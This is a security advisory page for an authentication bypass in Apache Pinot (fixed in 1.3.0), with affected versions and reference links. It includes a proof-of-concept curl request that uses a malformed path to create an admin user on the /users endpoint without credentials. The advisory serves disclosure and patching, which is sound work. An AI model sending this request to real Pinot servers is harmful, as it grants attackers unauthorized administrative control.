GHSA-6jwp-4wvj-6597
Apache Pinot Vulnerable to Authentication Bypass
Quick fix
GHSA-6jwp-4wvj-6597 — org.apache.pinot:pinot-broker: upgrade to the fixed version with the command below.
# pom.xml: bump <version>1.3.0</version> for org.apache.pinot:pinot-brokerDetails
Authentication Bypass Issue
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
Are you affected?
Enter the version of the package you're using.
Affected packages
0.8.0Fixed in: 1.3.0# pom.xml: bump <version>1.3.0</version> for org.apache.pinot:pinot-broker0.8.0Fixed in: 1.3.0# pom.xml: bump <version>1.3.0</version> for org.apache.pinot:pinot-common0.8.0Fixed in: 1.3.0# pom.xml: bump <version>1.3.0</version> for org.apache.pinot:pinot-controllerReferences
- https://nvd.nist.gov/vuln/detail/CVE-2024-56325[ADVISORY]
- https://github.com/apache/pinot/pull/14383[WEB]
- https://github.com/apache/pinot/commit/1b87488aeaf4836e3ef25b426ebbf1ad5a68e68f[WEB]
- https://github.com/apache/pinot/commit/89a22f097c5ff26396e58950c90d764066a56121[WEB]
- https://github.com/apache/pinot[PACKAGE]
- https://github.com/apache/pinot/releases/tag/release-1.3.0[WEB]
- https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v[WEB]
- http://www.openwall.com/lists/oss-security/2025/03/27/8[WEB]